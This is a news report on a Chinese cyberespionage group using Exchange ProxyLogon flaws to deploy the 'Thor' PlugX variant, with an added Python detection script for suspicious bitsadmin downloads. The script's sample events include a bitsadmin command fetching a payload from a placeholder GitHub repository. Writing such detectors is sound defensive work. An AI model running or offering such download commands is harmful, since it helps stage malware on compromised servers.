Chinese Hackers

30th July 2021, Kathmandu

A Chinese cyberespionage group known for targeting Southeast Asia exploited the Microsoft Exchange Server flaws that came to light earlier this March to deploy a previously undocumented variant of a remote access trojan (RAT) on compromised systems.

Attributing the intrusions to a threat actor tracked as PKPLUG (aka Mustang Panda and HoneyMyte), Palo Alto Networks' Unit 42 threat intelligence team said it identified a new version of the modular PlugX malware, called Thor, that was delivered as a post-exploitation tool to at least one of the breached servers.

Dating back to as early as 2008, PlugX is a fully featured second-stage implant with capabilities such as file upload, download, and modification, keystroke logging, webcam control, and access to a remote command shell.

"The variant observed [...] is unique in that it contains a change to its core source code: the replacement of its trademark word 'PLUG' to 'THOR,'" Unit 42 researchers Mike Harbison and Alex Hinchliffe noted in a technical write-up published Tuesday. "The earliest THOR sample uncovered was from August 2019, and it's the earliest known instance of the rebranded code. New features were observed in this variant, including enhanced payload-delivery mechanisms and abuse of trusted binaries."

After Microsoft disclosed on March 2 that China-based hackers, codenamed Hafnium, were exploiting zero-day bugs in Exchange Server collectively known as ProxyLogon to steal sensitive data from select targets, multiple threat actors, including ransomware groups (DearCry and Black Kingdom) and crypto-mining gangs (LemonDuck), were also observed exploiting the flaws to hijack Exchange servers and install a web shell that granted code execution at the highest privilege level.

PKPLUG now joins that list, according to Unit 42, which found the attackers bypassing antivirus detection on Microsoft Exchange servers by leveraging legitimate executables such as BITSAdmin to retrieve a seemingly innocuous file ("Aro.dat") from an actor-controlled GitHub repository. The file, which houses the encrypted and compressed PlugX payload, takes its name from a freely available advanced repair and optimization tool designed to clean up and fine-tune issues in the Windows Registry.
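The BITSAdmin retrieval described above is a living-off-the-land pattern that defenders can hunt for in process-creation telemetry. The following Python snippet is an added example, not code from the article or from Unit 42, showing detection logic of that kind run over a few constructed events. The pipe-separated field layout, the parent process names, the destination path and the GitHub repository path in the sample lines are assumptions made for the example; the only detail taken from the report is the "Aro.dat" filename.

```python
"""Flag bitsadmin.exe downloads that match the LOLBin pattern described above.

The EVENTS below are CONSTRUCTED for this example (host|parent_image|image|command_line).
They are not telemetry from the Unit 42 report, and the GitHub path is a placeholder.
"""
import re
from dataclasses import dataclass

# Public code-hosting domains (assumption: a real deployment would tune this list
# and keep an allow-list of sanctioned BITS jobs).
CODE_HOSTING = {"github.com", "raw.githubusercontent.com", "objects.githubusercontent.com"}

# Parents that should not be launching a download tool on an Exchange server.
# w3wp.exe is the IIS worker that serves Exchange endpoints (and any web shell).
SUSPICIOUS_PARENTS = {"w3wp.exe", "cmd.exe", "powershell.exe"}

# Captures the host name of the first http(s) URL on a command line.
URL_RE = re.compile(r"https?://([^/\s\"]+)[^\s\"]*", re.IGNORECASE)

EVENTS = [
    # Benign: an interactive admin session pulling a patch from an internal server.
    "EXCH01|explorer.exe|bitsadmin.exe|bitsadmin /transfer wu /download /priority high "
    "https://download.example-corp.internal/patch.msu C:\\Temp\\patch.msu",
    # Suspicious: the IIS worker spawning bitsadmin to fetch an opaque .dat from GitHub.
    "EXCH01|w3wp.exe|bitsadmin.exe|bitsadmin /transfer n /download /priority high "
    "https://raw.githubusercontent.com/example-actor/example-repo/main/Aro.dat C:\\Windows\\Temp\\Aro.dat",
    # Unrelated process creation that the scanner should ignore.
    "EXCH01|services.exe|svchost.exe|svchost.exe -k netsvcs",
]


@dataclass(frozen=True)
class Finding:
    host: str
    parent: str
    url: str
    dest: str
    reasons: tuple


def parse_event(line):
    """Split one constructed record into (host, parent, image, command_line)."""
    host, parent, image, cmdline = line.split("|", 3)
    return host.strip(), parent.strip().lower(), image.strip().lower(), cmdline.strip()


def bitsadmin_transfer(cmdline):
    """Return (url, destination) for a 'bitsadmin /transfer' command line, else None."""
    lowered = cmdline.lower()
    if "bitsadmin" not in lowered or "/transfer" not in lowered:
        return None
    match = URL_RE.search(cmdline)
    if not match:
        return None
    url = match.group(0)
    # bitsadmin /transfer takes the local path as the last positional argument.
    dest = cmdline[match.end():].strip().strip('"')
    return url, dest


def assess(event):
    """Return a Finding when a bitsadmin transfer has at least one suspicious trait."""
    host, parent, image, cmdline = parse_event(event)
    if not image.endswith("bitsadmin.exe"):
        return None
    transfer = bitsadmin_transfer(cmdline)
    if transfer is None:
        return None
    url, dest = transfer
    hostname = URL_RE.match(url).group(1).lower()
    reasons = []
    if hostname in CODE_HOSTING or hostname.endswith(".githubusercontent.com"):
        reasons.append("download from public code hosting")
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"spawned by {parent}")
    if dest.lower().endswith(".dat"):
        reasons.append("opaque .dat payload written to disk")
    return Finding(host, parent, url, dest, tuple(reasons)) if reasons else None


def scan(events):
    """Run assess() over every event and keep the findings."""
    return [f for f in map(assess, events) if f is not None]


if __name__ == "__main__":
    for finding in scan(EVENTS):
        print(finding)
```

The scoring is deliberately additive: a BITS job from w3wp.exe is worth a look on its own, but the combination of an IIS parent, a public code-hosting origin and an opaque .dat destination is what separates the pattern from routine patch downloads. In Sysmon or EDR data the parent and image fields are usually full paths, so match on the trailing file name as done here rather than on the whole string.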

The latest sample of PlugX comes equipped with a range of plugins that "provide attackers various capabilities to monitor, update and interact with the compromised system to fulfill their objectives," the researchers said. Thor's links to PKPLUG stem from piecing together the command-and-control infrastructure as well as overlaps in the malicious behaviors observed in other recently discovered PlugX samples.

Additional indicators of compromise related to the attack can be accessed here. Unit 42 has also made available a Python script that can decrypt and unpack encrypted PlugX payloads without needing the associated PlugX loaders.
